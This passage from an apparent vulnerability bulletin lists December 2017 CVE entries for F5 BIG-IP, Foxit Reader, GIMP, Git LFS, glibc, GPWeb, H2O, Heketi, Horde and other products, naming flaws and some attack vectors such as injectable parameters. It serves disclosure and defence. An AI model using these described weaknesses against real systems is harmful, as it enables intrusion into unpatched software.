 		In F5 BIG-IP APM software version 13.0.0 and 12.1.2, under rare conditions, the BIG-IP APM system appends log details when responding to client requests. Details in the log file can vary; customers running debug mode logging with BIG-IP APM are at highest risk.2017-12-21not yet calculatedCVE-2017-6139
CONFIRM
f5 -- multiple_productsIn F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, undisclosed requests made to BIG-IP virtual servers which make use of the "HTTP/2 profile" may result in a disruption of service to TMM.2017-12-21not yet calculatedCVE-2017-6151
CONFIRM
f5 -- multiple_productsIn F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0, a slow memory leak as a result of undisclosed IPv4 or IPv6 packets sent to BIG-IP management port or self IP addresses may lead to out of memory (OOM) conditions.2017-12-21not yet calculatedCVE-2017-6135
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0, 12.1.0 - 12.1.2 and 11.5.1 - 11.6.1, an undisclosed sequence of packets, sourced from an adjacent network may cause TMM to crash.2017-12-21not yet calculatedCVE-2017-6134
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0 and 12.0.0 - 12.1.2, undisclosed traffic patterns sent to BIG-IP virtual servers, with the TCP Fast Open and Tail Loss Probe options enabled in the associated TCP profile, may cause a disruption of service to the Traffic Management Microkernel (TMM).2017-12-21not yet calculatedCVE-2017-6136
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and Websafe software version 13.0.0, 12.0.0 to 12.1.2, 11.6.0 to 11.6.1 and 11.5.0 - 11.5.4, an undisclosed sequence of packets sent to BIG-IP High Availability state mirror listeners (primary and/or secondary IP) may cause TMM to restart.2017-12-21not yet calculatedCVE-2017-6132
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator and WebSafe software version 13.0.0, 12.0.0 - 12.1.2, 11.6.0 - 11.6.1 and 11.5.0 - 11.5.4, in some circumstances, Traffic Management Microkernel (TMM) does not properly handle certain malformed TLS1.2 records, which allows remote attackers to cause a denial-of-service (DoS) or possible remote command execution on the BIG-IP system.2017-12-21not yet calculatedCVE-2017-6164
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, malicious requests made to virtual servers with an HTTP profile can cause the TMM to restart. The issue is exposed with BIG-IP APM profiles, regardless of settings. The issue is also exposed with the non-default "normalize URI" configuration options used in iRules and/or BIG-IP LTM policies.2017-12-21not yet calculatedCVE-2017-6138
CONFIRM
f5 -- multiple_products
 		On the BIG-IP 2000s, 2200s, 4000s, 4200v, i5600, i5800, i7600, i7800, i10600,i10800, and VIPRION 4450 blades, running version 11.5.0, 11.5.1, 11.5.2, 11.5.3, 11.5.4, 11.6.0, 11.6.1, 12.0.0, 12.1.0, 12.1.1 or 12.1.2 of BIG-IP LTM, AAM, AFM, Analytics, ASM, DNS, GTM or PEM, an undisclosed sequence of packets sent to Virtual Servers with client or server SSL profiles may cause disruption of data plane services.2017-12-21not yet calculatedCVE-2017-6140
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, undisclosed HTTP requests may cause a denial of service.2017-12-21not yet calculatedCVE-2017-6133
CONFIRM
f5 -- multiple_products
 		In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, Link Controller, PEM and WebSafe software version 13.0.0 and 12.1.0 - 12.1.2, race conditions in iControl REST may lead to commands being executed with different privilege levels than expected.2017-12-21not yet calculatedCVE-2017-6167
CONFIRM
fortinet -- forticlient
 		An Information Disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations.2017-12-15not yet calculatedCVE-2017-14184
BID
CONFIRM
fortunescripts.com -- fs_lynda_clone
 		FS Lynda Clone 1.0 has SQL Injection via the keywords parameter to tutorial/.2017-12-18not yet calculatedCVE-2017-17643
MISC
EXPLOIT-DB
foxit -- readerThis vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the yTsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4977.2017-12-20not yet calculatedCVE-2017-16589
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the value attribute of Field objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4980.2017-12-20not yet calculatedCVE-2017-10958
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the author attribute of the Document object. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5282.2017-12-20not yet calculatedCVE-2017-16581
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the removeField method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5296.2017-12-20not yet calculatedCVE-2017-16587
CONFIRM
MISC
foxit -- readerThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the XFA's bind element. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5091.2017-12-20not yet calculatedCVE-2017-16575
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the signer method of XFA's Signature objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-5015.2017-12-20not yet calculatedCVE-2017-14823
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the tile index member of SOT markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4978.2017-12-20not yet calculatedCVE-2017-10956
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the setAction method of Link objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4981.2017-12-20not yet calculatedCVE-2017-10959
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the tile index of the SOT marker in JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5012.2017-12-20not yet calculatedCVE-2017-14820
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the formNodes method of XFA Node objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5018.2017-12-20not yet calculatedCVE-2017-14826
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the xOsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5014.2017-12-20not yet calculatedCVE-2017-14822
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the xTsiz member of SIZ markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5013.2017-12-20not yet calculatedCVE-2017-14821
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4982.2017-12-20not yet calculatedCVE-2017-14818
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the arrowEnd attribute of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4979.2017-12-20not yet calculatedCVE-2017-10957
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of references to the app object from FormCalc. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5072.2017-12-20not yet calculatedCVE-2017-16571
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the pageSpan method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5029.2017-12-20not yet calculatedCVE-2017-14837
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the clearItems XFA method. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5288.2017-12-20not yet calculatedCVE-2017-16582
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within FormCalc's closeDoc method. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5073.2017-12-20not yet calculatedCVE-2017-16572
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the setFocus method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5022.2017-12-20not yet calculatedCVE-2017-14830
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the remove method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5017.2017-12-20not yet calculatedCVE-2017-14825
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the insert method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5016.2017-12-20not yet calculatedCVE-2017-14824
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the channel number member of the cdef box. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5011.2017-12-20not yet calculatedCVE-2017-14819
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the append method of XFA Node objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5019.2017-12-20not yet calculatedCVE-2017-14827
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the w method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5020.2017-12-20not yet calculatedCVE-2017-14828
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the openList method of XFAScriptObject objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5021.2017-12-20not yet calculatedCVE-2017-14829
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the page method of XFA Layout objects. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this to execute code in the context of the current process. Was ZDI-CAN-5027.2017-12-20not yet calculatedCVE-2017-14835
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of FileAttachment annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5026.2017-12-20not yet calculatedCVE-2017-14834
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the author attribute of Circle Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5023.2017-12-20not yet calculatedCVE-2017-14831
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of Caret Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5024.2017-12-20not yet calculatedCVE-2017-14832
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5244.2017-12-20not yet calculatedCVE-2017-16579
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within util.printf. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5290.2017-12-20not yet calculatedCVE-2017-16584
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the datasets element of XFA forms. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5289.2017-12-20not yet calculatedCVE-2017-16583
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the addAnnot method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5295.2017-12-20not yet calculatedCVE-2017-16586
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the app.response method. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5294.2017-12-20not yet calculatedCVE-2017-16585
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the ImageField node of XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5281.2017-12-20not yet calculatedCVE-2017-16580
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within XFA's field element. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5092.2017-12-20not yet calculatedCVE-2017-16576
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.2.25013. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the picture elements within XFA forms. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5216.2017-12-20not yet calculatedCVE-2017-16578
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the style attribute of Text Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5025.2017-12-20not yet calculatedCVE-2017-14833
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the alignment attribute of Field objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5094.2017-12-20not yet calculatedCVE-2017-16577
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.3.1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the modDate attribute of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5028.2017-12-20not yet calculatedCVE-2017-14836
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LZWDecode filters. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5078.2017-12-20not yet calculatedCVE-2017-16573
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of Image filters. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5079.2017-12-20not yet calculatedCVE-2017-16574
CONFIRM
MISC
foxit -- reader
 		This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 8.3.1.21155. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SOT markers. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-4976.2017-12-20not yet calculatedCVE-2017-16588
CONFIRM
MISC
genexis_b.v. -- genexis_automatic_provisioning_system
 		CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain "chk" value (48bit) derived from the MAC. The algorithm used to compute the "chk" was disclosed by reverse engineering the CPE's firmware. As a result, it is possible to forge valid "chk" values for any given MAC address and therefore receive the configuration settings of other subscribers' CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2.2017-12-20not yet calculatedCVE-2017-6094
FULLDISC
gimp -- gimp
 		In GIMP 2.8.22, there is a heap-based buffer over-read in ReadImage in plug-ins/common/file-tga.c (related to bgr2rgb.part.1) via an unexpected bits-per-pixel value for an RGBA image.2017-12-20not yet calculatedCVE-2017-17786
MISC
MISC
gimp -- gimp
 		In GIMP 2.8.22, there is a heap-based buffer over-read in read_creator_block in plug-ins/common/file-psp.c.2017-12-20not yet calculatedCVE-2017-17787
MISC
MISC
gimp -- gimp
 		In GIMP 2.8.22, there is a heap-based buffer overflow in the fli_read_brun function in plug-ins/file-fli/fli.c.2017-12-20not yet calculatedCVE-2017-17785
MISC
MISC
gimp -- gimp
 		In GIMP 2.8.22, there is a heap-based buffer over-read in load_image in plug-ins/common/file-gbr.c in the gbr import parser, related to mishandling of UTF-8 data.2017-12-20not yet calculatedCVE-2017-17784
MISC
MISC
gimp -- gimp
 		In GIMP 2.8.22, there is a stack-based buffer over-read in xcf_load_stream in app/xcf/xcf.c when there is no '\0' character after the version string.2017-12-20not yet calculatedCVE-2017-17788
MISC
MISC
gimp -- gimp
 		In GIMP 2.8.22, there is a heap-based buffer overflow in read_channel_data in plug-ins/common/file-psp.c.2017-12-20not yet calculatedCVE-2017-17789
MISC
MISC
github -- git_lfs
 		GitHub Git LFS before 2.1.1 allows remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, located on a "url =" line in a .lfsconfig file within a repository.2017-12-21not yet calculatedCVE-2017-17831
MISC
MISC
MISC
gitlab -- gitlab
 		GitLab 9.4.x before 9.4.2 does not support LDAP SSL certificate verification, but a verify_certificates LDAP option was mentioned in the 9.4 release announcement. This issue occurred because code was not merged. This is related to use of the omniauth-ldap library and the gitlab_omniauth-ldap gem.2017-12-17not yet calculatedCVE-2017-17716
MISC
MISC
MISC
gnu -- c_library
 		elf/dl-load.c in the GNU C Library (aka glibc or libc6) 2.19 through 2.26 mishandles RPATH and RUNPATH containing $ORIGIN for a privileged (setuid or AT_SECURE) program, which allows local users to gain privileges via a Trojan horse library in the current working directory, related to the fillin_rpath and decompose_rpath functions. This is associated with misinterpretion of an empty RPATH/RUNPATH token as the "./" directory. NOTE: this configuration of RPATH/RUNPATH for a privileged program is apparently very uncommon; most likely, no such program is shipped with any common Linux distribution.2017-12-17not yet calculatedCVE-2017-16997
CONFIRM
CONFIRM
CONFIRM

golden_frog -- vyprvpn


 		In Golden Frog VyprVPN before 2.15.0.5828 for macOS, the vyprvpnservice launch daemon has an unprotected XPC service that allows attackers to update the underlying OpenVPN configuration and the arguments passed to the OpenVPN binary when executed. An attacker can abuse this vulnerability by forcing the VyprVPN application to load a malicious dynamic library every time a new connection is made.2017-12-20not yet calculatedCVE-2017-17809
MISC
gpweb -- gpweb
 		Insecure Permissions vulnerability in db.php file in GPWeb 8.4.61 allows remote attackers to view the password and user database.2017-12-18not yet calculatedCVE-2017-15877
MISC
gpweb -- gpweb
 		SQL injection vulnerability in Password Recovery in GPWeb 8.4.61 allows remote attackers to execute arbitrary SQL commands via the "checkemail" parameter.2017-12-18not yet calculatedCVE-2017-15875
MISC
gpweb -- gpweb
 		Unrestricted File Upload vulnerability in GPWeb 8.4.61 allows remote authenticated users to upload any type of file, including a PHP shell.2017-12-18not yet calculatedCVE-2017-15876
MISC
graphicsmagick -- graphicsmagick In GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in ReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.2017-12-20not yet calculatedCVE-2017-17782
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick 
 		In GraphicsMagick 1.3.27a, there is a buffer over-read in ReadPALMImage in coders/palm.c when QuantumDepth is 8.2017-12-20not yet calculatedCVE-2017-17783
CONFIRM
CONFIRM
h2o -- h2o
 		H2O version 2.2.3 and earlier allows remote attackers to cause a denial of service in the server via specially crafted HTTP/2 header.2017-12-22not yet calculatedCVE-2017-10908
CONFIRM
JVN
h2o -- h2o
 		H2O version 2.2.2 and earlier allows remote attackers to cause a denial of service in the server via specially crafted HTTP/1 header.2017-12-22not yet calculatedCVE-2017-10868
CONFIRM
JVN
h2o -- h2o
 		H2O version 2.2.3 and earlier allows remote attackers to cause a denial of service in the server via unspecified vectors.2017-12-22not yet calculatedCVE-2017-10872
CONFIRM
JVN
h2o -- h2o
 		Buffer overflow in H2O version 2.2.2 and earlier allows remote attackers to cause a denial-of-service in the server via unspecified vectors.2017-12-22not yet calculatedCVE-2017-10869
CONFIRM
JVN
heketi -- heketi
 		A security-check flaw was found in the way the Heketi 5 server API handled user requests. An authenticated Heketi user could send specially crafted requests to the Heketi server, resulting in remote command execution as the user running Heketi server and possibly privilege escalation.2017-12-18not yet calculatedCVE-2017-15103
REDHAT
CONFIRM
CONFIRM
heketi -- heketi
 		An access flaw was found in Heketi 5, where the heketi.json configuration file was world readable. An attacker having local access to the Heketi server could read plain-text passwords from the heketi.json file.2017-12-18not yet calculatedCVE-2017-15104
REDHAT
CONFIRM
CONFIRM
CONFIRM
horde_project -- groupware
 		In Horde Groupware through 5.2.22, SQL Injection exists via the group parameter to /services/prefs.php or the homePostalCode parameter to /turba/search.php.2017-12-20not yet calculatedCVE-2017-17781
MISC
huawei -- fusionsphere_openstack
